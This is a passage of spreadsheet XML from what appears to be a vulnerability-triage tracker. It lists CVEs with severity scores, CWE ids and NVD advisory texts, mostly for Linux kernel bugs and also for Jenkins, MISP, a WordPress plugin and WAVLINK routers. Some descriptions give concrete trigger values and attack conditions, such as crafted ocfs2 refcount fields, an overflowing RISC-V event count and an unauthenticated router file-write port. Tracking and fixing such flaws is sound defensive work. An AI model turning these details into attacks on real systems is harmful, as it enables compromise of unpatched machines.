      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr"/>
      <c r="Q171" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-566</t>
        </is>
      </c>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, transient fields cannot be excluded from deserialization, allowing attackers able to submit configuration updates to specify the values of transient fields that will be deserialized, the impact depending on how those fields are used.</t>
        </is>
      </c>
      <c r="S171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84650</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85236</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr"/>
      <c r="Q172" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>A cross-site request forgery (CSRF) vulnerability existed in the cullEmptyEvents action of MISP. The endpoint performed a state-changing and irreversible operation while accepting HTTP GET requests.
Because bodyless GET requests are not subject to CakePHP's CSRF validation, an attacker could cause an authenticated MISP user with sufficient privileges to invoke the endpoint simply by causing their browser to load a crafted URL, for example through an embedded image or other automatically requested resource.
Successful exploitation triggers the deletion of published empty events. The deletion is particularly significant because the operation uses skipBlocklist, meaning the removed events do not leave blocklist entries that could prevent or track their subsequent synchronization. This can result in unintended and potentially irreversible deletion of MISP event records without explicit user interaction.
The vulnerability was addressed by restricting cullEmptyEvents to HTTP POST requests, ensuring that CakePHP's normal CSRF protections are applied to the operation.</t>
        </is>
      </c>
      <c r="S172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85236</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85677</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr"/>
      <c r="Q173" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>The Gutenverse News  WordPress plugin before 3.3.3 does not restrict the extra HTML it adds to WordPress's allowed elements to the context it is meant for, applying the same relaxed list to every sanitisation context including untrusted comments, allowing unauthenticated users to store JavaScript that will execute in the browser of any administrator who reviews the comment queue, and of any visitor to the post once the comment is approved.</t>
        </is>
      </c>
      <c r="S173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85677</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89009</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr"/>
      <c r="Q174" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>WAVLINK WN535M1 and WN535M3 routers running firmware prior to M35M1_V250922 contain an unauthenticated arbitrary file write vulnerability that allows remote attackers to overwrite any file on the device by sending a crafted payload to the sync_server daemon on TCP port 13136. The daemon, which runs as root and requires no authentication, accepts a 100-byte filename field in its protocol header without path canonicalization, allowing attackers to supply an absolute path and write arbitrary content to overwrite startup scripts or credential stores to achieve persistent system compromise.</t>
        </is>
      </c>
      <c r="S174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89009</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89445</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr"/>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommufd: Fix UAF in selftest IOPF reporting
IOMMUFD selftest TRIGGER_IOPF borrows an attach handle from
group-&gt;pasid_array without synchronizing against PASID detach,
then a concurrent iommu_report_device_fault() can dereference
that borrowed handle's domain pointer after the detach erases
the handle and frees the backing struct iommufd_attach_handle.
TRIGGER_IOPF then dereferences the freed handle, causing a UAF.
Fix by adding a iopf_rwsem in mock_dev to follow the expected design
of a real driver. Hold its read side across the whole
iommu_report_device_fault() call, and its write side around every
path that attaches, detaches, or replaces a device domain.
This can block new reports and drains in-flight reports before an old
attach handle or the IOPF fault parameter can be removed.
Also take the write side while registering a mock device, since
it can invoke the mock driver's default-domain attach callback.</t>
        </is>
      </c>
      <c r="S175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89445</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89450</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr"/>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/tegra241-cmdqv: Reject a vSID wider than the SID_MATCH field
tegra241_vintf_init_vsid() programs the guest-provided vSID into SID_MATCH,
whose VIRT_SID field spans bits [20:1] with bit 0 as the match-enable flag.
The HW therefore matches only a 20-bit Stream ID.
The bound check rejects only virt_sid &gt; UINT_MAX, which admits a value far
wider than the field. The write "virt_sid &lt;&lt; 1 | 0x1" then drops every bit
above 20: a virt_sid of 0x80000000 lands as SID_MATCH = 0x1, a valid match
on vSID 0, so the entry aliases the wrong Stream ID. Because vdev-&gt;virt_id
is guest-controlled, a VMM can trigger it.
Validate virt_sid against the field width with FIELD_MAX(), and program the
register with FIELD_PREP() so the value and the field stay consistent.</t>
        </is>
      </c>
      <c r="S176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89450</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89493</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr"/>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr"/>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: validate rl_used against rl_count in refcount block validator
ocfs2_find_refcount_rec_in_rl() walks the on-disk refcount record array
with:
	for (; i &lt; le16_to_cpu(rb-&gt;rf_records.rl_used); i++) {
		rec = &amp;rb-&gt;rf_records.rl_recs[i];
		...
rl_recs[] lives in a single metadata block (4096 bytes on the common
configuration), so its real capacity is fixed by
ocfs2_refcount_recs_per_rb(sb) (247 records for a 4K block with the
16-byte ocfs2_refcount_rec).  rl_used and rl_count are both read directly
off disk by ocfs2_validate_refcount_block() and are never checked against
that capacity, nor against each other, before any refcount/reflink/CoW
operation walks the array.
A crafted (or corrupted) refcount block with rl_used == 0xffff makes the
loop above walk far past the end of the block, dereferencing rl_recs[i]
for i up to 65534.  The resulting index is then handed to the sibling
ocfs2_insert_refcount_rec(), whose insert-shift does:
	if (index &lt; le16_to_cpu(rf_list-&gt;rl_used))
		memmove(&amp;rf_list-&gt;rl_recs[index + 1],
			&amp;rf_list-&gt;rl_recs[index],
			(le16_to_cpu(rf_list-&gt;rl_used) - index) *
			 sizeof(struct ocfs2_refcount_rec));
i.e.  a memmove() of up to (0xffff - index) * 16 bytes (~1 MiB) from an
offset already past the block.  This is reachable from an ordinary reflink
(FICLONE) against a crafted/corrupted ocfs2 image: attaching an extent
whose cpos sorts past every real record in the leaf forces the lookup to
run off the end instead of returning early on a match.  The attacker model
is local: CAP_SYS_ADMIN mounting a crafted or corrupted ocfs2 image, or a
raw write to the block device backing an already-mounted ocfs2 filesystem.
ocfs2_validate_refcount_block() already validates the block's ECC,
signature, rf_blkno and rf_fs_generation, but never rl_count/rl_used
against the block's actual on-disk capacity.  This is the same class of
gap that ocfs2_validate_extent_block() (fs/ocfs2/alloc.c) already closes
for the sibling extent-list header, which checks both the record capacity
and the "used" bound before any code walks h_list.l_recs[]:
	if (le16_to_cpu(eb-&gt;h_list.l_count) != ocfs2_extent_recs_per_eb(sb)) {
		rc = ocfs2_error(...);
		goto bail;
	}
	if (le16_to_cpu(eb-&gt;h_list.l_next_free_rec) &gt;
	    le16_to_cpu(eb-&gt;h_list.l_count)) {
		rc = ocfs2_error(...);
		goto bail;
	}
Add the equivalent pair of checks to ocfs2_validate_refcount_block():
reject a refcount block whose rl_count does not match the fixed per-block
capacity returned by ocfs2_refcount_recs_per_rb(), and reject rl_used &gt;
rl_count.  Both checks are skipped when OCFS2_REFCOUNT_TREE_FL is set,
because in that case the same union bytes hold an ocfs2_extent_list
(rf_list), not the refcount record list (rf_records) -- that layout is
already validated separately by ocfs2_validate_extent_block() when the
referenced extent block is read.  This mirrors the existing
"!(rb-&gt;rf_flags &amp; OCFS2_REFCOUNT_TREE_FL)" guard used elsewhere in this
file (e.g.  ocfs2_get_refcount_rec()) to decide whether rf_records or
rf_list is the live member of the union.
With this in place, a forged rl_used/rl_count is caught at block
validation time (ocfs2_error()), consistent with every other corruption
check in this function, instead of driving an out-of-bounds read in
ocfs2_find_refcount_rec_in_rl() and a subsequent out-of-bounds memmove()
in ocfs2_insert_refcount_rec().
Verified against a crafted image on a v6.19 KASAN (KASAN_GENERIC) build:
replaying the same reflink (FICLONE) reliably hit a KASAN report in
__ocfs2_increase_refcount()/ocfs2_insert_refcount_rec() before this patch,
and triggers no report once ocfs2_validate_refcount_block() rejects the
forged rl_used/rl_count.</t>
        </is>
      </c>
      <c r="S177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89493</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89513</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr"/>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RISC-V: KVM: Fix PMU event info array size overflow
SBI PMU EVENT_GET_INFO stores guest-controlled num_events * sizeof(*einfo)
in a 32-bit integer. On RV64, num_events = 0x10000001 makes 0x100000010
truncate to 16. KVM then allocates one entry but loops over the original
num_events, causing out-of-bounds reads and writes. A nested guest
triggered:
BUG: KASAN: slab-out-of-bounds in kvm_riscv_vcpu_pmu_event_info+0xa4/0x142
Read of size 4 at addr ff600000074d46b0 by task init/1
Call Trace:
[&lt;ffffffff8006471c&gt;] kvm_riscv_vcpu_pmu_event_info+0xa4/0x142
[&lt;ffffffff800690c0&gt;] kvm_sbi_ext_pmu_handler+0xca/0x268
[&lt;ffffffff8006779e&gt;] kvm_riscv_vcpu_sbi_ecall+0xec/0x1e6
[&lt;ffffffff8006008c&gt;] kvm_riscv_vcpu_exit+0x48c/0x540
[&lt;ffffffff8005ea0a&gt;] kvm_arch_vcpu_ioctl_run+0x37e/0xc80
Allocated by task 1:
 __kmalloc_noprof+0x19e/0x4b0
 kvm_riscv_vcpu_pmu_event_info+0x72/0x142
 kvm_sbi_ext_pmu_handler+0xca/0x268
 kvm_riscv_vcpu_sbi_ecall+0xec/0x1e6
 kvm_riscv_vcpu_exit+0x48c/0x540
 kvm_arch_vcpu_ioctl_run+0x37e/0xc80
The buggy address is located 0 bytes to the right of
 allocated 16-byte region [ff600000074d46a0, ff600000074d46b0)
Store the shared-memory size in size_t and reject multiplication overflow.
Allocate the guest-driven array with GFP_KERNEL_ACCOUNT so it is charged
to kmemcg, and use __GFP_NOWARN to suppress allocation failure warnings.
Use kvcalloc() to allow vmalloc fallback and an unsigned long loop index
to match num_events.</t>
        </is>
      </c>
      <c r="S178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89513</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89534</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr"/>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
svcrdma: Clear sc_cm_id when ADDR_CHANGE replacement fails
When svc_rdma_listen_handler() handles RDMA_CM_EVENT_ADDR_CHANGE,
it creates a replacement listener cm_id and returns 1, telling
the CM core to destroy the old one. If the replacement allocation
fails, sc_cm_id still points at the old cm_id that the CM core is
about to destroy. Any subsequent dereference of sc_cm_id --
such as svc_rdma_detach()'s rdma_disconnect() call -- is a
use-after-free.
NULL sc_cm_id on the failure path and guard svc_rdma_detach()'s
rdma_disconnect() call against NULL so that the listener can
be torn down safely when the server shuts down.</t>
        </is>
      </c>
      <c r="S179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89534</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89569</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr"/>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: RFCOMM: serialize security confirmation handling
rfcomm_security_cfm() looks up a session on session_list and then walks
its DLC list without holding rfcomm_mutex. Since RFCOMM session teardown
uses rfcomm_mutex, krfcommd can close and free the same session and DLCs
concurrently:
  hci_rx_work                    krfcommd
  -----------                    ---------
  rfcomm_session_get()
                                 rfcomm_lock()
                                 rfcomm_session_close()
                                   rfcomm_dlc_unlink()
                                   rfcomm_session_del()
                                     kfree(s)
                                 rfcomm_unlock()
  walk s-&gt;dlcs
The callback can then read a freed session list head and touch freed DLCs
while updating their flags or timers.
Serialize the session lookup and DLC traversal in rfcomm_security_cfm()
with rfcomm_mutex. This matches the existing RFCOMM session lifetime
rules and prevents concurrent rfcomm_session_del() / rfcomm_dlc_unlink()
from tearing the objects down while the callback is using them.
KASAN reported:
  BUG: KASAN: slab-use-after-free in rfcomm_security_cfm+0x41c/0x440
  Read of size 8 at addr ffff888111fb3960 by task kworker/u17:1/89
  Workqueue: hci0 hci_rx_work
  Call Trace:
   rfcomm_security_cfm+0x41c/0x440
   hci_encrypt_cfm+0x139/0x590
   hci_encrypt_change_evt+0x37b/0xc40
   hci_event_packet+0x71b/0xb20
   hci_rx_work+0x293/0x730
  Allocated by task 69:
   rfcomm_session_add+0x9e/0x2f0
   rfcomm_run+0x44b/0x41e0
  Freed by task 69:
   kfree+0x131/0x3c0
   rfcomm_session_del+0x188/0x220
   rfcomm_run+0x1985/0x41e0</t>
        </is>
      </c>
      <c r="S180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89569</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89601</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr"/>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ext2: Fix lost inode updates for IS_SYNC inodes
ext2_setsize() and ext2_xattr_set2() had a construct like:
	if (IS_SYNC(inode)) {
		sync_inode_metadata(inode, 1);
	} else {
		mark_inode_dirty(inode);
	}
which leads to lost inode updates for IS_SYNC inodes because
sync_inode_metadata() does anything only if the inode is already dirty
and hence inode updates may be simply lost. Fix the problem by
unconditionally marking the inode dirty and *then* call
sync_inode_metadata().</t>
        </is>
      </c>
      <c r="S181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89601</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89626</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr"/>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: sensor: custom: Fix field sysfs group cleanup on failure
hid_sensor_custom_add_attributes() creates one sysfs group for each
custom sensor field. If sysfs_create_group() fails after some groups
have already been created, the function returns the error without
removing the previously created groups.
Add a local unwind path to remove the groups that were already created.
With enable_sensor exposed only after the field attributes are ready,
this path can free sensor_inst-&gt;fields without leaving enable_sensor
able to access pointers into that array.</t>
        </is>
      </c>
      <c r="S182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89626</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89663</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr"/>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
nfsd: revoke copy-notify stateids before dropping their reference
Copy-notify stateids live in the s2s_cp_stateids IDR and on their parent
stid's sc_cp_list, pinned by a single membership reference.
_free_cpntf_state_locked() only unlinks an entry once its refcount reaches
zero, so any revoke path that runs while a concurrent
